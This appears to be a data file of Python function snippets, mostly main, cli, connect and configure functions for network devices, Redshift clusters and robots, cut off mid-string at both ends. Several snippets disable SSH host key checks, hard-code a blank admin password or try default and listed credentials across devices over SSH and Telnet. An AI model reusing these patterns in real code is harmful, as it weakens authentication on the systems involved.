connect to [Default: localhost]\")\n netgroup.add_option('-p', '--port', action=\"store\", type=\"int\", dest=\"port\", default=9999,\n help=\"Port the server is listening on [Default: 9999]\")\n parser.add_option_group(netgroup)\n\n options, args = parser.parse_args()\n\n list_and_exit = False\n if options.list:\n list_and_exit = True\n\n if not options.ui or options.ui not in uilist:\n print \"You must pick one of the available UIs with --ui\"\n\n if list_and_exit:\n print \"Available UIs:\"\n for name, info in uilist.items():\n print \"%s %s\" % (name.ljust(30), info[0])\n return 0\n\n # create the robot\n robot = Robot(options.host, options.port)\n status = robot.get_status()\n\n # handle gracefully disconnecting the robot if anything else fails\n try:\n # create the ui\n uimod = uilist[options.ui][1]\n ui = uimod.get_ui(**vars(options))\n\n # create the steerer\n steerer = steering.SteeringModel(status)\n\n if options.sound:\n player = sound.SoundPlayer(status)\n player.play(player.SOUNDS['startup'])\n else:\n player = None\n\n # create the robot client\n client = RobotClient(robot, ui, steerer, player, options.allow_control, options.become_controller)\n\n # start up all the pieces in the right order\n if player: player.start()\n try:\n ui.init()\n ui.start()\n try:\n client.run()\n finally:\n ui.stop()\n finally:\n if player:\n player.stop(player.SOUNDS['crash'])\n finally:\n if not robot.disconnected:\n robot.disconnect()", "def main():\n\n PASS = raw_input('password> ')\n\n with manager.connect(host=HOST, port=PORT, username=USER, password=PASS,\n hostkey_verify=False, device_params={'name': 'default'},\n look_for_keys=False, allow_agent=False) as m:\n\n # print all NETCONF capabilities\n with open('output/netconf_101_capability.txt', 'w') as file:\n for capability in m.server_capabilities:\n file.write(str(capability))\n file.write('\\n')\n\n result_xmllist = []\n # run commands on the remote device\n for key in xmlns_dic.keys():\n data = m.get(('subtree', xmlns_dic[key]))\n result_xmllist.append(data)\n\n with open('output/netconf_101_rpc.xml', 'w') as file:\n file.write(str(result_xmllist))\n\n result_jsonlist = []\n for data in result_xmllist:\n # print all in xml\n print(data)\n\n # print all in json\n result_xml_str = repr(data)\n result_json_parsed_str = json.dumps(xmltodict.parse(result_xml_str))\n result_json_parsed_dict = json.loads(result_json_parsed_str)\n\n print(json.dumps(result_json_parsed_dict, indent=4, sort_keys=True))\n result_jsonlist.append(result_json_parsed_dict)\n\n with open('output/netconf_101_rpc.json', 'w') as file:\n json.dump(result_jsonlist, file, indent=4, sort_keys=True)\n\n\n # xml_doc = xml.dom.minidom.parseString(result.xml)\n # mac_address = xml_doc.getElementsByTagName(\"mod:mac_address\")\n # print(mac_address)", "def main():\n arg_fmt = argparse.RawDescriptionHelpFormatter\n parser = argparse.ArgumentParser(formatter_class=arg_fmt,\n description=main.__doc__)\n\n parser.add_argument(\n '-s', '--save', metavar='PATH',\n help='save current EE config to given file'\n )\n parser.add_argument(\n '-l', '--load', metavar='PATH',\n help='load config from given file onto EE'\n )\n args = parser.parse_args(rospy.myargv()[1:])\n\n print(\"Initializing node... \")\n rospy.init_node('ee_config_editor', anonymous=True)\n\n ee = intera_interface.get_current_gripper_interface()\n if not ee:\n rospy.logerr(\"Could not detect an attached EndEffector!\")\n return\n\n if args.save:\n rospy.loginfo(\"Saving EE config to {}\".format(args.save))\n save_config(ee, args.save)\n\n if args.load:\n rospy.loginfo(\"Loading config and writing config to ClickSmart from {}\".format(args.load))\n load_config(ee, args.load)\n\n def clean_shutdown():\n print(\"\\nExiting example...\")\n\n rospy.on_shutdown(clean_shutdown)", "def main():\n extremehandle = {\n \"device_type\": \"extreme\",\n \"ip\": \"10.54.116.175\",\n \"username\": \"admin\",\n \"password\": \"\",\n }\n net_connect = ConnectHandler(**extremehandle)\n output = net_connect.send_command(\"show config vlan\")\n print(output)", "def configure():\n parser = argparse.ArgumentParser(description=\"welcome to AutomateBGP!\")\n parser.add_argument('-u', '--username', dest='username',\n help='username to login to nodes')\n parser.add_argument('-p', '--password', dest='password',\n help='password to login to nodes')\n parser.add_argument('-f', '--filename', dest='filename',\n help='text file containing the node data (expected format...)')\n return parser.parse_args()", "def main():\n config = configparser.ConfigParser()\n config.read('dwh.cfg')\n\n print('config file read! - now connecting...')\n conn = psycopg2.connect(\"host={} dbname={} user={} password={} port={}\".format(*config['CLUSTER'].values()))\n cur = conn.cursor()\n\n print('connection established! - now dropping tables...')\n drop_tables(cur, conn)\n\n print('tables dropped! - now creating tables...')\n create_tables(cur, conn)\n\n print('tables are now created! - closing connection...')\n conn.close()\n\n print('done!')", "def main():\n # Parse arguments.\n parser = argparse.ArgumentParser(description='Console for cluster test.')\n parser.add_argument('-c', dest='command_config_file',\n default='command_config',\n help='set command config file path (default=command_config)')\n args = parser.parse_args()\n\n console = Console()\n console.config(args.command_config_file)\n console.init_proxies()\n console.run()", "def connect():", "def configure(args):\n print('Configures HPC fleet with given name \"{}\"'.format(args))", "def cassandra_nodetool(mycluster=RING_1_dev__allnodes,cmd=\"ring\"):\n print CASSANDRA_NODETOOL\n cmd1 = CASSANDRA_NODETOOL + \" -hlocalhost -p \" + str(PORT) + \" \"\n task_run(cmd1+cmd,mycluster)", "def main(): \n config = configparser.ConfigParser()\n config.read('dwh.cfg')\n\n conn = psycopg2.connect(\"host={} dbname={} user={} password={} port={}\".format(*config['CLUSTER'].values()))\n cur = conn.cursor()\n\n drop_tables(cur, conn)\n create_tables(cur, conn)\n\n conn.close()", "def cli():\n\n global platform_fanutil\n global platform_chassis\n\n if os.geteuid() != 0:\n click.echo(\"Root privileges are required for this operation\")\n sys.exit(1)\n\n # Load the helper class\n helper = UtilHelper()\n\n if not helper.check_pddf_mode():\n click.echo(\"PDDF mode should be supported and enabled for this platform for this operation\")\n sys.exit(1)\n\n # Load new platform api class\n try:\n import sonic_platform.platform\n platform_chassis = sonic_platform.platform.Platform().get_chassis()\n except Exception as e:\n click.echo(\"Failed to load chassis due to {}\".format(str(e)))\n\n\n # Load platform-specific fanutil class if new platform object class is not found\n if platform_chassis is None:\n try:\n platform_fanutil = helper.load_platform_util(PLATFORM_SPECIFIC_MODULE_NAME, PLATFORM_SPECIFIC_CLASS_NAME)\n except Exception as e:\n click.echo(\"Failed to load {}: {}\".format(PLATFORM_SPECIFIC_MODULE_NAME, str(e)))\n sys.exit(2)", "def configure(node):\n script = []\n script.append(Statements.exec(\"hostname %s\" % node.getName()))\n script.append(Statements.createOrOverwriteFile(\n \"/etc/hostname\", [node.getName()]))\n script.append(Statements.exec(\n \"sed -i 's/127.0.0.1/127.0.0.1\\t%s/' /etc/hosts\" % node.getName()))\n return script", "def connect_cluster():\n sfmvip, sfuser, sfpass = get_inputs()\n try:\n sfe = ElementFactory.create(sfmvip,sfuser,sfpass, print_ascii_art=False)\n return sfe\n except Exception as ex:\n if \"Bad Credentials\" in str(ex):\n print(\"Incorrect user or password entered, please re-enter:\\n\")\n sfuser = input(\"Enter user name: \")\n sfpass = getpass(\"Enter password for user {} on cluster {}: \".format(sfuser, sfmvip))\n sfe = ElementFactory.create(sfmvip,sfuser,sfpass, print_ascii_art=False)\n return sfe\n elif \"host has failed to respond\" in str(ex):\n sfmvip = input(\"Please re-enter MVIP: \")\n sfe = ElementFactory.create(sfmvip,sfuser,sfpass, print_ascii_art=False)\n return sfe\n else:\n print(\"Script will exit due to an unhandled exception: \\n{}\".format(str(ex)))\n exit()", "def create_cluster():\n config = get_kube_config()\n command = CLUSTER_CREATE_COMMAND.replace('\\n','').format(cluster_name=config['cluster_name'],\n project_name=config['project_name'],\n machine_type=config['machine_type'],\n disk_size=config['disk_size'],\n nodes=config['nodes'],\n zone=config['zone'])\n print \"Creating cluster by running {}\".format(command)\n subprocess.check_call(shlex.split(command))\n command = AUTH_COMMAND.replace('\\n','').format(cluster_name=config['cluster_name'],\n project_name=config['project_name'],\n zone=config['zone'])\n print \"Authenticating with cluster by running {}\".format(command)\n subprocess.check_call(shlex.split(command))", "def usage():\n\tprint()\n\tprint(\n\t\t'\\t Usage: python conos_aicuu_client.py [-h] [--help] <ENDPOINT> <ENVIRONMENT> <CLIENT_ID> <CLIENT_SECRET> <INPUT_FILE> <OUTPUT_FILE> <NUMBER_THREAD>')\n\tprint('\\t -h : help')\n\tprint('\\t ENDPOINT : 1: /v1.0/person')\n\tprint('\\t 2: /v1.0/company')\n\tprint('\\t ENVIRONMENT : must be one of: dev, test, int, prod')\n\tprint('\\t CLIENT_ID : used for obtaining access token')\n\tprint('\\t CLIENT_SECRET : used for obtaining access token')\n\tprint('\\t INPUT_FILE : location of the request input file')\n\tprint('\\t OUTPUT_FILE : location of the output file (analyze report)')\n\tprint('\\t NUMBER_THREAD : (optional) number of threads to process data (from 1 -> 8, default is 1)')\n\tprint('\\n\\t Example : python conos_aicuu_client.py 1 test Admin 123456 data/person/input.txt data/person/output.txt 5')\n\texit(2)", "def main():\n config = configparser.ConfigParser()\n config.read('dwh.cfg')\n\n conn = psycopg2.connect(\"host={} dbname={} user={} password={} port={}\".format(*config['CLUSTER'].values()))\n cur = conn.cursor()\n\n drop_tables(cur, conn)\n create_tables(cur, conn)\n\n conn.close()", "def main():\n config = configparser.ConfigParser()\n config.read('dwh.cfg')\n\n conn = psycopg2.connect(\"host={} dbname={} user={} password={} port={}\".format(*config['CLUSTER'].values()))\n cur = conn.cursor()\n\n drop_tables(cur, conn)\n create_tables(cur, conn)\n\n conn.close()", "def main():\n config = configparser.ConfigParser()\n config.read('dwh.cfg')\n\n conn = psycopg2.connect(\"host={} dbname={} user={} password={} port={}\".format(*config['CLUSTER'].values()))\n cur = conn.cursor()\n\n drop_tables(cur, conn)\n create_tables(cur, conn)\n\n conn.close()", "def main():\n \n config = configparser.ConfigParser()\n config.read('dwh.cfg')\n\n conn = psycopg2.connect(\"host={} dbname={} user={} password={} port={}\".format(*config['CLUSTER'].values()))\n cur = conn.cursor()\n\n drop_tables(cur, conn)\n create_tables(cur, conn)\n\n conn.close()", "def main(args):\n # server on other machine needs to connect to this machines IP\n client = WheelchairClientProtocol(args)\n client.listen('0.0.0.0', 9999)\n\n # server on this machines needs to connect to other machines IP\n server = WheelchairServerProtocol(args)\n server.connect('192.168.1.106', 9999)", "def cli():", "def cli():", "def cli():", "def cli():", "def cli():", "def cli():", "def cli():", "def cli():", "def cli():", "def cli():", "def cli():", "def cli():", "def cli():", "def cli():", "def cli():", "def cli():", "def cli():", "def cli():", "def cli():", "def cli():", "def cli():", "def cli():", "def cli():", "def cli():", "def cli():", "def cli():", "def cli():", "def cli():", "def main():\n\n ip_filename = arguments.ip_file.strip()\n\n # Set project directory to 'logs' unless an optional directory was given\n if arguments.project_dir:\n project = arguments.project_dir\n else:\n project = 'logs'\n\n if arguments.device_class:\n device_cls = arguments.device_class.strip()\n else:\n # Default device class for Netmiko\n device_cls = 'cisco_ios'\n\n ips = []\n ips = load_txt_file(ip_filename)\n\n total_devices = len(ips)\n # Track devices which fail login or pings\n missing_devices = []\n # Track devices which were successfully accessed\n devices_verified = 0\n\n # Create Directory for show output based on the Project Name\n path = os.path.join(\"./\", project.strip())\n # print path\n if not os.path.exists(path):\n os.makedirs(path)\n print(f\"Created directory: {path}\")\n\n # Create logfile for the discovery run in same directory as the resulting show commands\n # logfilename = project + \"-logfile.log\"\n # logfilename = os.path.join(path, logfilename)\n\n if total_devices > 1:\n heading = f\"##### Executing show commands for discovery project {project} for {str(total_devices)} devices! #####\"\n else:\n heading = f\"##### Executing show commands for discovery project {project} for {str(total_devices)} device! #####\"\n\n print(\"#\" * len(heading))\n print(heading)\n print(\"#\" * len(heading))\n\n print(f\"Device IP(s) in project {project}:\")\n for i in ips:\n print(f\"\\t{i}\")\n print(\"--------------------------\")\n print(f\"Total devices: {str(len(ips))}\")\n print(\"#\" * len(heading))\n print(\"\\n\")\n\n ## Default Credentials\n # Default list of credentials in format username, user password, enable password\n credentials = ['cisco, cisco, cisco']\n\n ## Load Credentials if -c or --creds option was used\n if arguments.creds:\n # Override default credentials as a new credential file with one or more sets of credentials was provided\n cred_filename = arguments.creds\n credentials = load_txt_file(cred_filename)\n\n ##### SHOW COMMANDS\n commands = []\n\n ## Load custom show commands if -c or --show option was used\n if arguments.show:\n # Override default list of show commands as a new file with one or more show commands was provided\n show_filename = arguments.show\n custom_showcmds = load_txt_file(show_filename)\n\n # first command to send is an end to get back to the main prompt\n commands = custom_showcmds\n\n else:\n # DEFAULT SHOW COMMANDS\n commands = [\"show version\",\n ]\n\n # if not arguments.pingonly:\n # print(\"Sending \" + str(len(commands)) + \" show commands:\")\n # for x in range(0, len(commands)):\n # print(\"\\t\" + commands[x])\n\n # For each IP in the ip address file, attempt to ping, attempt to log in, attempt to enter enable mode and\n # execute and save show command output\n for mgmt_ip in ips:\n\n login_success = False\n enable_success = False\n output = ''\n hostname = \"dev_\" + mgmt_ip\n\n # If Ping is successful attempt to log in and if that is successful attempt to enter enable mode and\n # execute list of show commands\n device_pings = ping_device(mgmt_ip)\n\n if device_pings:\n print(f\"Device {mgmt_ip} Responds to Pings!\\n\")\n\n # If the -i or --icmppingonly option was provided when the script was called, then only execute the ping code.\n if arguments.icmppingonly:\n # Keep a count of the devices that are pingable\n devices_verified += 1\n # Skip everything else as the icmp ping only option was given\n continue\n\n if len(credentials) > 1:\n print(\"**** Attempting multiple credentials to access device....\")\n\n try_telnet = False\n # Credential Loop\n for line in credentials:\n\n lineitem = line.split(',')\n uname = lineitem[0].strip()\n upwd = lineitem[1].strip()\n epwd = lineitem[2].strip()\n\n if not try_telnet:\n\n print(f\"\\t**** Attempting user credentials for {uname} with SSH.\")\n\n try:\n dev_conn = ConnectHandler(device_type=device_cls, ip=mgmt_ip, username=uname, password=upwd,\n secret=epwd)\n login_success = True\n\n\n except NetMikoAuthenticationException:\n print(f\"\\tNetMikoAuthenticationException: Device failed SSH Authentication with username {uname}\")\n missing_devices = missing_device_log(missing_devices, mgmt_ip, 'Failed Authentication')\n login_success = False\n # continue\n\n except (EOFError, SSHException, NetMikoTimeoutException):\n print('\\tSSH is not enabled for this device.')\n missing_devices = missing_device_log(missing_devices, mgmt_ip, 'Failed SSH')\n login_success = False\n try_telnet = True\n # continue\n\n except Exception as e:\n print(\"\\tGeneral Exception: ERROR!:\" + str(sys.exc_info()[0]) + \"==>\" + str(sys.exc_info()[1]))\n print(str(e))\n missing_devices = missing_device_log(missing_devices, mgmt_ip, 'General Exception')\n login_success = False\n # continue\n\n if login_success:\n print(\"\\t**** SSH Login Succeeded! Will not attempt login with any other credentials.\")\n # Break out of credential loop\n break\n else:\n print(\"\\t**** SSH Login Failed!\")\n # continue\n\n # Try Telnet\n if try_telnet:\n print(\"\\t**** Attempting user credentials for \" + uname + \" with Telnet.\")\n\n try:\n dev_conn = ConnectHandler(device_type='cisco_ios_telnet', ip=mgmt_ip, username=uname,\n password=upwd,\n secret=epwd)\n login_success = True\n\n except NetMikoAuthenticationException:\n print(f\"\\tNetMikoAuthenticationException: Device failed SSH Authentication with username {uname}\")\n missing_devices = missing_device_log(missing_devices, mgmt_ip, 'Failed Authentication')\n login_success = False\n continue\n\n except Exception as e:\n print(\"\\tGeneral Exception: ERROR!:\" + str(sys.exc_info()[0]) + \"==>\" + str(sys.exc_info()[1]))\n print(str(e))\n missing_devices = missing_device_log(missing_devices, mgmt_ip, 'General Exception')\n login_success = False\n continue\n\n if login_success:\n print(\"\\t**** Telnet Login Succeeded! Will not attempt login with any other credentials.\")\n # Break out of credential loop\n break\n else:\n print(\"\\t**** Telnet Login Failed!\")\n continue\n\n if login_success:\n # Check to see if login has resulted in enable mode (i.e. priv level 15)\n is_enabled = dev_conn.check_enable_mode()\n\n if not is_enabled:\n try:\n dev_conn.enable()\n enable_success = True\n except Exception as e:\n print(str(e))\n print(\"\\tCannot enter enter enable mode on device!\")\n missing_devices = missing_device_log(missing_devices, mgmt_ip, 'failed enable')\n enable_success = False\n continue\n else:\n print(\"\\tDevice already in enabled mode!\")\n enable_success = True\n\n if enable_success:\n\n for cmd in commands:\n output += dev_conn.send_command(cmd, strip_prompt=False, strip_command=False)\n dev_conn.exit_config_mode()\n dev_conn.disconnect()\n\n # output contains a stream of text vs individual lines\n # split into individual lies for further parsing\n # output_lines = re.split(r'[\\n\\r]+', output)\n\n # show_info = get_show_info(output_lines)\n #\n # if show_info['hostname']:\n # hostname = show_info.pop('hostname')\n\n # print(\"Information for device: \" + hostname)\n # for k, v in show_info.items():\n # print(\"\\t\" + k +\"\\t\\t-\\t\" + v)\n\n # Save output to file\n timestr = time.strftime(\"%Y%m%d-%H%M%S\")\n\n log_filename = hostname + \"-\" + timestr + \".txt\"\n log_filename = os.path.join(path, log_filename)\n\n log_file = open(log_filename, 'w')\n log_file.write(\"!#Output file for device \" + hostname + \"\\n\")\n log_file.write(\"!#Commands executed on \" + timestr + \"\\n\\r\")\n log_file.write(\"!\\n\")\n log_file.write(output)\n log_file.close()\n devices_verified += 1\n print(\"\\nOutput results saved in: \" + log_filename + \"\\n\\n\")\n\n\n else:\n # Device does not PING\n print(\"Device is unreachable\")\n missing_devices.append(mgmt_ip)\n\n # Totals Verification\n if arguments.icmppingonly:\n info = (\"Total number of devices in IP list:\\t\\t\" + str(total_devices) + \"\\n\",\n \"Total number of devices which responded to pings:\\t\" + str(devices_verified) + \"\\n\")\n else:\n info = (\"Total number of devices in IP list:\\t\\t\" + str(total_devices) + \"\\n\",\n \"Total number of show command output files:\\t\" + str(devices_verified) + \"\\n\")\n\n\n # Print Note on totals\n for note in info:\n print(note)", "def __init__(self, hostname, python=None, tunnel_incoming=False,\n tunnel_outgoing=False, identity_filename=None,beforestart=\"\"):\n self.beforestart=beforestart\n super(openmdao.main.resource.ClusterHost, self).__init__(hostname, python, tunnel_incoming, tunnel_outgoing, identity_filename)", "def connect():\n\n crate = get_crate()\n crate.mch_comms.ipmitool_shell_connect()", "def main():\n\n # create an auth ticket for APIC-EM\n\n global APIC_EM_TICKET # make the ticket a global variable in this module\n APIC_EM_TICKET = get_service_ticket()\n\n # build a list with all device id's\n switch_id_list = get_switch_ids()\n switches_info = collect_switch_info(switch_id_list)\n\n # ask user for filename input and save file\n filename = get_input_file()\n output_file = open(filename, 'w', newline='')\n output_writer = csv.writer(output_file)\n for lists in switches_info:\n output_writer.writerow(lists)\n output_file.close()\n # pprint(switches_info) # print for data validation", "def setup_node(config, args):\n if args.templates:\n config['templates'].insert(0, args.templates)\n config.templates = config._templates()\n stdin, stderr = args.node.ssh(config.template(\"scripts/node_setup.sh\"))\n if stderr:\n print stderr\n else:\n print u\"Node ready at %s\" % (args.node.hostname)", "def main():\n\n # Define the path to the config file, and read it.\n conf_file = os.path.join(os.path.abspath(os.path.dirname(os.path.dirname(__file__))), 'conf', 'config.toml')\n configuration = read_config_file(conf_file)\n\n # Set our variables based on what is read from the config file.\n rs_url = configuration['platform']['url']\n api_key = configuration['platform']['api_key']\n client_id = configuration['platform']['client_id']\n\n # Specify ID for group that you would like to move your hosts to.\n group_id = 0 # UPDATE THIS WITH YOUR DESIRED GROUP ID\n\n # Move the hosts to the new group.\n print(f\"Moving host(s) to new group({group_id}).\")\n print()\n\n # Call the function to move your hosts\n successful = move_hosts_to_new_group(rs_url, api_key, client_id, group_id)\n\n if successful:\n print(\"The move was successful.\")\n\n else:\n print(\"The attempted move was not successful.\")", "def configure_orc8r():\n print('#### Configuring orc8r ####')\n subprocess.check_call(\n 'fab --fabfile=dev_tools.py register_federated_vm',\n shell=True, cwd=agw_path,\n )\n subprocess.check_call(\n 'fab register_feg_gw', shell=True, cwd=feg_path,\n )", "def main():\n config = get_config(CONFIG_FILENAME)\n print(\"Creating IAM role\")\n role = create_iam_role(config)\n print(\"Creating redshift cluster\")\n create_redshift_cluster(config, role)", "def run():\n partitions = libcalamares.globalstorage.value(\"partitions\")\n root_mount_point = libcalamares.globalstorage.value(\"rootMountPoint\")\n\n if not partitions:\n libcalamares.utils.warning(\"partitions is empty, {!s}\".format(partitions))\n return (_(\"Configuration Error\"),\n _(\"No partitions are defined for <pre>{!s}</pre> to use.\" ).format(\"initcpiocfg\"))\n if not root_mount_point:\n libcalamares.utils.warning(\"rootMountPoint is empty, {!s}\".format(root_mount_point))\n return (_(\"Configuration Error\"),\n _(\"No root mount point is given for <pre>{!s}</pre> to use.\" ).format(\"initcpiocfg\"))\n\n modify_mkinitcpio_conf(partitions, root_mount_point)\n\n return None", "def main():\n if len(sys.argv) != 5:\n print ('usage: %s <SRC_USER::SRC_PASSWD@@SRC_HOST> '\n '<DEST_USER:DEST_PASSWD@DEST_HOST> SRC_GW DEST_GW\\n'\n ' where\\n'\n ' HOST Aviatrix Controller hostname or IP\\n'\n ' USER Aviatrix Controller login username\\n'\n ' PASSWORD Aviatrix Controller login password\\n'\n ' GW name of a provisioned gateway\\n' % sys.argv[0])\n sys.exit(1)\n\n # connect to both controllers\n src_controller = get_controller_from_argument(sys.argv[1])\n dst_controller = get_controller_from_argument(sys.argv[2])\n\n # find the source gateway\n gw_name = sys.argv[3]\n src_gwy = src_controller.get_gateway_by_name('admin', gw_name)\n if not src_gwy:\n print 'Source gateway %s not found\\n' % (gw_name)\n return\n\n # find the destination gateway\n gw_name = sys.argv[4]\n dst_gwy = dst_controller.get_gateway_by_name('admin', gw_name)\n if not dst_gwy:\n print 'Destination gateway %s not found\\n' % (gw_name)\n return\n\n # clone the firewall policies and the FQDN filters\n clone_fw_rules(src_controller, src_gwy, dst_controller, dst_gwy)\n clone_fqdn_rules(src_controller, src_gwy, dst_controller, dst_gwy)", "def main():\n partition = 'Common'\n login, pwd, device = get_device_data()\n mgmt = ManagementRoot(login, pwd, device)\n ltm = mgmt.tm.ltm\n pools = ltm.pools.get_collection()\n nodes = ltm.nodes.get_collection()\n display_nodes(nodes)\n display_pools(pools)\n virtuals = ltm.virtuals.get_collection()\n display_virtuals(virtuals)", "def write_flow_csh(self):\n str = self.LicLocalPort\n fout = open(self.cshBatch2File+\".csh\",\"w\")\n fout.write(\"\"\"\\\n#!/bin/csh\n\nif ( $#argv == 0 ) then\n echo \"\"\n echo \"USAGE: $0 [-powerOnDemand] javaBatchFile.java Simulation.sim\"\n echo \"\"\n exit\nendif\n\nset powerOnDemand=0\nset javaBatchFile=$1\nset simFile=$2\nset powerOnDemandLicense=\"\"\nif ( \"$1\" == \"-powerOnDemand\" ) then\n set powerOnDemand=1\n set javaBatchFile=$2\n set simFile=$3\n set powerOnDemandLicense=\"-licpath %s@localhost -podkey %s\"\nendif\n\"\"\" % (str,self.starccmLic))\n\n fout.write(\"\"\"\\\n\nalias echo \"/bin/echo -e\"\necho \"\\\\n#==============================================\"\necho \"# Begin Star Simulation\"\necho \"# Java Batch File = $javaBatchFile\"\necho \"# sim File = $simFile\"\nif ( $powerOnDemand == 1 ) echo \"# Using Power on Demand license.\"\nset starttime = `date`\necho \"# Start Time = ${starttime}\\\\n\"\n\nif ( $powerOnDemand == 1 ) then\n echo \"\\\\n# Running 'killall ssh' to clear out all prior tunnels.\"\n killall ssh\n echo \"\\\\n# Making a tunnel for the Power on Demand License.\"\n ssh -f -L %s:flex.cd-adapco.com:1999 -L 2099:flex.cd-adapco.com:2099 -N %s\n echo \"\\\\n# Checking to see if there is a valid port tunnel in place for the Power on Demand License.\"\n ps -ef | grep '%s:flex.cd-adapco.com:1999'\nendif\n\"\"\" % (str,self.LicAccessName,str))\n\n fout.write(\"\"\"\\\n\nsetenv CDLMD_LICENSE_FILE %s\nunsetenv LM_LICENSE_FILE\n\nset lnodes=`cat $PBS_NODEFILE`\nset llnodes = `echo $lnodes | sed 's/ /,/g'`\n#echo \"llnodes = $llnodes\"\nset numCores = `echo $llnodes | sed 's/,/ /g' | wc -w`\n\nset EXEC = \"%s\"\n\n$EXEC -power ${powerOnDemandLicense} \\\\\n -on $llnodes \\\\\n -rsh 'ssh -o stricthostkeychecking=no' \\\\\n -classpath ~/bin \\\\\n -load \\\\\n -batch $javaBatchFile \\\\\n $simFile\nset endtime = `date`\necho \"# End Time = ${endtime}\"\necho \"# Start Time = ${starttime}\\\\n\"\necho \"# End Star Simulation\\\\n\"\n\"\"\" % (self.CDLMD_LicFile, self.starccmExec))\n\n fout.close()", "def main() -> None:\n parser = argparse.ArgumentParser(description=\"Flower\")\n parser.add_argument(\n \"--server_address\",\n type=str,\n default=DEFAULT_SERVER_ADDRESS,\n help=f\"gRPC server address (default: {DEFAULT_SERVER_ADDRESS})\",\n )\n parser.add_argument(\n \"--cid\", type=str, required=True, help=\"Client CID (no default)\"\n )\n parser.add_argument(\n \"--log_host\", type=str, help=\"Logserver address (no default)\",\n )\n parser.add_argument(\n \"--nb_clients\", type=int, default=10, help=\"Total number of clients\",\n )\n args = parser.parse_args()\n\n # Configure logger\n fl.common.logger.configure(f\"client_{args.cid}\", host=args.log_host)\n\n # Load model and data\n #model = cifar.load_model()\n #model.to(DEVICE)\n #trainset, testset = cifar.load_data()\n\n # Start client\n #client = CifarClient(args.cid, model, trainset, testset, args.nb_clients)\n #client = CifarClient(args.cid, trainset, testset, args.nb_clients)\n client = CifarClient(args.cid,args.nb_clients)\n fl.client.start_client(args.server_address, client)", "def provision():\n sudo('chef-client')", "def main():\n executor(option().host)", "def start(args, config):\n print('Starts an HPC fleet: \"{}\"'.format(args))", "def create_cluster(module, switch_list):\n global CHANGED_FLAG\n output = ''\n new_cluster = False\n\n node1 = switch_list[0]\n node2 = switch_list[1]\n\n name = node1 + '-' + node2 + '-cluster'\n\n cli = pn_cli(module)\n cli += ' switch %s cluster-show format name no-show-headers ' % node1\n cluster_list = run_cli(module, cli)\n\n if cluster_list is not None:\n cluster_list = cluster_list.split()\n if name not in cluster_list:\n new_cluster = True\n\n if new_cluster or cluster_list is None:\n cli = pn_cli(module)\n cli += ' switch %s cluster-create name %s ' % (node1, name)\n cli += ' cluster-node-1 %s cluster-node-2 %s ' % (node1, node2)\n run_cli(module, cli)\n CHANGED_FLAG.append(True)\n output += '%s: Created cluster %s\\n' % (node1, name)\n\n return output", "def createConnectionToCli(self):\n connected = False\n # loop until connected\n while not connected:\n try:\n self.dataClient = Client(\n ('localhost', 5000), authkey=b'secret password')\n connected = True\n except ConnectionRefusedError:\n pass\n\n self.logger.debug('Connected to Process!')", "def main():\n # Creating resources/clients for all needed infrastructure: EC2, IAM, Redshift\n ec2 = create_client('ec2', boto3.resource)\n iam = create_client('iam', boto3.client)\n redshift = create_client('redshift', boto3.client)\n \n # Create needed IAM / ARN roles for Redshift\n create_iam_role(iam)\n arn_role = create_arn_role(iam)\n \n # Create cluster and await its completion\n create_redshift_cluster(redshift, arn_role)\n cluster_props = query_redshift_status(redshift)\n \n # Get endpoint into to allow querying\n info = get_redshift_endpoint_info(redshift, cluster_props)\n print(info)\n # TODO: Save info to aws.cfg\n \n # Update security groups to ACTUALLY allow querying\n update_cluster_security_group(ec2, cluster_props)\n \n # Test connection to see that everything (hopefully) went well\n test_connection()\n \n # End of main\n return", "def main():\n\n # endpdoint = \"restconf/data/ietf-interfaces:interfaces\"\n # endpoint = f\"restconf/data/ietf-interfaces:interfaces/interface={name}\"\n\n if len(argv) > 1:\n try:\n inventory = load_inventory(argv[1])\n except FileExistsError as err:\n print(\"FileExistsError: \", err)\n else:\n print(\"You must provide a path to your inventory file.\")\n sys.exit()\n\n r1 = inventory['dev-r1']\n loop = [interface for interface in r1[\"interface\"] if interface[\"name\"] == \"Loopback0\"][0]\n\n payload = render_payload(\n loop,\n \"interface.j2\"\n )\n\n session = create_session(r1[\"username\"], r1[\"password\"])\n endpoint = f\"restconf/data/ietf-interfaces:interfaces/interface=Loopback0\"\n results = put_request(r1[\"host\"],session, endpoint, payload)\n print(results)\n\n save_endpoint = \"restconf/operations/cisco-ia:save-config/\"\n saved = save_config(r1[\"host\"], session, save_endpoint)\n\n # target_routers = [\"dev-r1\"]\n\n # for host_key, attribs in inventory.items():\n\n # if host_key in target_routers:\n # print(f\"configuring interfaces on {host_key}\")\n\n # # create a session imported from restconf_api\n # session = create_session(attribs)\n\n # # get all interfaces\n # results = get_interface(attribs, session, \"Loopback0\")\n\n # interface = results[\"ietf-interfaces:interface\"]\n\n # print(json.dumps(interface))\n # # convert to yaml\n # # yaml_output = yaml.safe_dump(results)\n # # with open(\"vars/interfaces.yml\", \"w\") as file:\n # # file.write(yaml_output)\n\n # # results = update_interfaces(attribs, session)\n # # print(results.text, results.status_code)\n\n # # print(get_interfaces(attribs, session))", "def main():\n run_nutanix_vm_creation_module()", "def main():\n insert_gateway_values(\"hermes/bin/gateways.txt\")\n return", "def main():\n config = configparser.ConfigParser()\n config.read('dwh.cfg')\n key = config.get('AWS', 'KEY')\n secret = config.get('AWS', 'SECRET')\n region = config.get('AWS', 'REGION')\n iam_role_name = config.get('IAM_ROLE', 'NAME')\n cluster_identifier = config.get('REDSHIFT', 'IDENTIFIER')\n\n iam = boto3.client('iam',\n aws_access_key_id=key,\n aws_secret_access_key=secret,\n region_name=region)\n\n redshift = boto3.client('redshift',\n aws_access_key_id=key,\n aws_secret_access_key=secret,\n region_name=region)\n\n create_redshift_iam_role(iam, iam_role_name)\n attach_redshift_iam_role_policy(iam, iam_role_name)\n iam_role_arn = get_redshift_iam_role_arn(iam, iam_role_name)\n print('Created IAM Role Arn is: ' + iam_role_arn)\n create_redshift_cluster(redshift, config, iam_role_arn)\n redshift_cluster_host = get_redshift_cluster_host(redshift, cluster_identifier)\n print('Created Redshift Cluster Host is: ' + redshift_cluster_host)", "def main(connection_file):\n\n ctx = zmq.Context.instance()\n\n with open(connection_file) as f:\n cfg = json.loads(f.read())\n\n reg_url = cfg['interface']\n iopub_port = cfg['iopub']\n iopub_url = f\"{reg_url}:{iopub_port}\"\n\n session = Session(key=cfg['key'].encode('ascii'))\n sub = ctx.socket(zmq.SUB)\n\n # This will subscribe to all messages:\n sub.SUBSCRIBE = b''\n # replace with b'' with b'engine.1.stdout' to subscribe only to engine 1's stdout\n # 0MQ subscriptions are simple 'foo*' matches, so 